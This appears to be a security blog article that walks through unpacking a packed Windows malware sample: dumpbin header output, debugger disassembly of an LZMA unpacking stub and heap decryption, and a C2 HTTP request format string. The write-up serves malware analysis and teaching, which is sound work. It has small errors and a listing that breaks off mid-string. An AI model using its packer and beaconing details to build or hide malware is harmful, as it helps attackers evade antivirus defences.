Malware analysis

From Unpacking to Communication Analysis

Malwares are usually packed with custom packers, which make static and dynamic analysis difficult. Some of the static analysis tools do not work on packed samples because packed is not in its real form, also its defeats anti-virus programs which work based on the kind of static signature detection. Packers usually compress or encrypt and when in runtime they are decrypted to the control flow that is being transferred to the original entry point.

Tools Required:

Ollydbg Debugger.
OllyDump plugin.
IMPREC import Fixer.

Filename: packed.exe
Before starting, we will dump the headers of exe which is packed.exe and we will then check out the structure of exe including the section headers. There is a tool known as dumpbin which is included as a part of windows sdk

dumpbin /all

Here is the ouput we get from dumpbin program

[plain]
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.

Dump of file Sample

PE signature found

File Type: EXECUTABLE IMAGE

FILE HEADER VALUES
14C machine (x86)
4 number of sections
51BD9FFA time date stamp Sun Jun 16 16:52:34 2013
0 file pointer to symbol table
0 number of symbols
E0 size of optional header
10F characteristics
Relocations stripped
Executable
Line numbers stripped
Symbols stripped
32 bit word machine

OPTIONAL HEADER VALUES
10B magic # (PE32)
7.02 linker version
4000 size of code
200 size of initialized data
0 size of uninitialized data
22000 entry point (00422000)
1000 base of code
5000 base of data
400000 image base (00400000 to 00424B75)
1000 section alignment
200 file alignment
5.01 operating system version
0.00 image version
5.01 subsystem version
0 Win32 version
24B76 size of image
400 size of headers
0 checksum
2 subsystem (Windows GUI)
3 DLL characteristics
RESERVED – UNKNOWN
RESERVED – UNKNOWN
100000 size of stack reserve
1000 size of stack commit
100000 size of heap reserve
1000 size of heap commit
0 loader flags
10 number of directories
0 [ 0] RVA [size] of Export Directory
24A94 [ E2] RVA [size] of Import Directory
6000 [ 1B92C] RVA [size] of Resource Directory
0 [ 0] RVA [size] of Exception Directory
0 [ 0] RVA [size] of Certificates Directory
0 [ 0] RVA [size] of Base Relocation Directory
0 [ 0] RVA [size] of Debug Directory
0 [ 0] RVA [size] of Architecture Directory
0 [ 0] RVA [size] of Global Pointer Directory
0 [ 0] RVA [size] of Thread Storage Directory
0 [ 0] RVA [size] of Load Configuration Directory
0 [ 0] RVA [size] of Bound Import Directory
0 [ 0] RVA [size] of Import Address Table Directory
22BC [ 40] RVA [size] of Delay Import Directory
0 [ 0] RVA [size] of COM Descriptor Directory
5000 [ 71] RVA [size] of Reserved Directory

SECTION HEADER #1
.text name
4000 virtual size
1000 virtual address (00401000 to 00404FFF)
800 size of raw data
400 file pointer to raw data (00000400 to 00000BFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
60000020 flags
Code
Execute Read

SECTION HEADER #2
.rdata name
91E virtual size
5000 virtual address (00405000 to 0040591D)
200 size of raw data
C00 file pointer to raw data (00000C00 to 00000DFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
80000040 flags
Initialized Data
Write Only

SECTION HEADER #3
.RES name
1BA00 virtual size
6000 virtual address (00406000 to 004219FF)
19200 size of raw data
E00 file pointer to raw data (00000E00 to 00019FFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C0000040 flags
Initialized Data
Read Write

SECTION HEADER #4
.RENOS name
2B76 virtual size
22000 virtual address (00422000 to 00424B75)
2C00 size of raw data
1A000 file pointer to raw data (0001A000 to 0001CBFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E0000040 flags
Initialized Data
Execute Read Write

Summary

3000 .RENOS
1C000 .RES
1000 .rdata
4000 .text
[/plain]

There are three sections namely .RENOS .RES .RDATA and .text, which is enough to prove that it wasn’t made from a standard compiler and most probably is a packer or compressor.

The following is the output we get from debugger output at the entry point of the executable:

[plain]
00422000 > 68 00204200 PUSH OFFSET Sample.<ModuleEntryPoint>
00422005 B8 80204200 MOV EAX,Sample.00422080
0042200A FFD0 CALL EAX
0042200C 83C4 04 ADD ESP,4
0042200F B8 67224000 MOV EAX,Sample.00402267
00422014 FFE0 JMP EAX
00422016 2200 AND AL,BYTE PTR DS:[EAX]
[/plain]

00422014 FFE0 JMP EAX We can see here that the compressor jumps to the original entry point of the executable. Before that a call is made to Sample.00422080 which is possibly the compression routine of the executable.

Now let’s try to look into the subroutine:

[plain]
00422080 55 PUSH EBP
00422081 89E5 MOV EBP,ESP
00422083 57 PUSH EDI
00422084 56 PUSH ESI
00422085 53 PUSH EBX
00422086 83EC 2C SUB ESP,2C
00422089 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
0042208C 8078 7C 00 CMP BYTE PTR DS:[EAX+7C],0
00422090 0F85 64010000 JNZ Samplecc.004221FA
00422096 C745 E0 00000000 MOV DWORD PTR SS:[EBP-20],0
0042209D 8B40 6C MOV EAX,DWORD PTR DS:[EAX+6C]
004220A0 8B08 MOV ECX,DWORD PTR DS:[EAX]
004220A2 394D E0 CMP DWORD PTR SS:[EBP-20],ECX
004220A5 8D58 04 LEA EBX,DWORD PTR DS:[EAX+4]
004220A8 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX
004220AB E9 8C000000 JMP Samplecc.0042213C
004220B0 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
004220B3 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
004220B6 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20]
004220B9 894424 0C MOV DWORD PTR SS:[ESP+C],EAX
004220BD B8 04000000 MOV EAX,4
004220C2 894424 08 MOV DWORD PTR SS:[ESP+8],EAX
004220C6 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8]
004220C9 894424 04 MOV DWORD PTR SS:[ESP+4],EAX
004220CD 8B03 MOV EAX,DWORD PTR DS:[EBX]
004220CF 8B79 70 MOV EDI,DWORD PTR DS:[ECX+70]
004220D2 01F8 ADD EAX,EDI
004220D4 890424 MOV DWORD PTR SS:[ESP],EAX
004220D7 FF12 CALL DWORD PTR DS:[EDX]
004220D9 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
004220DC 8B03 MOV EAX,DWORD PTR DS:[EBX]
[/plain]

After analyzing the algorithm we have come to know as a LZMA compression algorithm,

which decompresses data at 0x00401000

JMP EAX is the place where we jump to when the original entry point is taken place:

[plain]
00402267 . 60 PUSHAD
00402268 . F8 CLC
00402269 . 1BFF SBB EDI,EDI
0040226B . 8B35 6C504000 MOV ESI,DWORD PTR DS:[40506C] ; DBGHELP.ImageRvaToVa
00402271 . 68 5E534000 PUSH Samplecc.0040535E ; /pModule = ""
00402276 . 832C24 40 SUB DWORD PTR SS:[ESP],40 ; |
0040227A . FF15 38504000 CALL DWORD PTR DS:[405038] ; GetModuleHandleA
00402280 . 96 XCHG EAX,ESI
00402281 . 09F7 OR EDI,ESI
00402283 . 2BC7 SUB EAX,EDI
00402285 . B9 0000FFFF MOV ECX,FFFF0000
0040228A . F7D9 NEG ECX
0040228C . 3BC1 CMP EAX,ECX
0040228E . 76 1F JBE SHORT Samplecc.004022AF
00402290 . 46 INC ESI
00402291 . 56 PUSH ESI
00402292 . 59 POP ECX
00402293 . 1349 3B ADC ECX,DWORD PTR DS:[ECX+3B]
00402296 . 68 60000000 PUSH 60
0040229B . 83E9 85 SUB ECX,-7B
0040229E . 5B POP EBX
0040229F . 3B19 CMP EBX,DWORD PTR DS:[ECX]
004022A1 . 73 0C JNB SHORT Samplecc.004022AF
004022A3 . 33F6 XOR ESI,ESI
004022A5 . 81EE 1E534000 SUB ESI,Samplecc.0040531E ; ASCII "DBGHELP.dll"
004022AB . F7DE NEG ESI
004022AD .^EB A9 JMP SHORT Samplecc.00402258
004022AF > B9 00040000 MOV ECX,400
004022B4 >-E2 FE LOOPD SHORT Samplecc.004022B4
004022B6 . 61 POPAD
004022B7 . C3 RETN
[/plain]

The second phase of unpacking extracted binary code in a heap region.

Which is present here:

[plain]
003C00C4 5D POP EBP ; 003C0694
003C00C5 5E POP ESI
003C00C6 873424 XCHG DWORD PTR SS:[ESP],ESI
003C00C9 56 PUSH ESI
003C00CA E8 31050000 CALL 003C0600
003C00CF E8 6F050000 CALL 003C0643
003C00D4 8BF8 MOV EDI,EAX
003C00D6 6A 00 PUSH 0
003C00D8 6A 00 PUSH 0
003C00DA FF75 6C PUSH DWORD PTR SS:[EBP+6C]
003C00DD 57 PUSH EDI
003C00DE FF55 28 CALL DWORD PTR SS:[EBP+28]
003C00E1 8B4D 70 MOV ECX,DWORD PTR SS:[EBP+70]
003C00E4 6A 00 PUSH 0
003C00E6 54 PUSH ESP
[/plain]

Decrypted bytes are copied into heap region here

[plain]
003C0190 F3:AA REP STOS BYTE PTR ES:[EDI]
003C0192 5F POP EDI
003C0193 8BCB MOV ECX,EBX
003C0195 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
003C0197 FF55 0C CALL DWORD PTR SS:[EBP+C]
[/plain]

Connection to c2c:

After unpacking, the following is where the information downloads and uploads the configuration to c2c verser

[plain]
004035A0 |. FF75 AC PUSH DWORD PTR SS:[EBP-54] ; /<%s>
004035A3 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |<%s>
004035A6 |. FF75 B4 PUSH DWORD PTR SS:[EBP-4C] ; |<%s>
004035A9 |. 68 00344000 PUSH 6fe5860a.00403400 ; |Format = "GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s

"
004035AE |. FF75 BC PUSH DWORD PTR SS:[EBP-44] ; |s
004035B1 |. E8 8ED50000 CALL 6fe5860a.00410B44 ; wsprintfA
004035B6 |. 83C4 14 ADD ESP,14
004035B9 |. EB 1B JMP SHORT 6fe5860a.004035D6
004035BB |> 68 BB474100 PUSH 6fe5860a.004147BB ; /<%s> = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
004035C0 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |<%s>
004035C3 |. FF75 B4 PUSH DWORD PTR SS:[EBP-4C] ; |<%s>
004035C6 |. 68 00344000 PUSH 6fe5860a.00403400 ; |Format = "GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s

Inside connect_to_c2c we are able to locate call to send

D12d0x34X works as an information security researcher in France. His areas of interest include malware and web application development.

From Unpacking to Communication Analysis

D12d0x34X

Related Articles

How AsyncRAT is escaping security defenses

Chrome extensions used to steal users’ secrets

Luna ransomware encrypts Windows, Linux and ESXi systems

Bahamut Android malware and its new features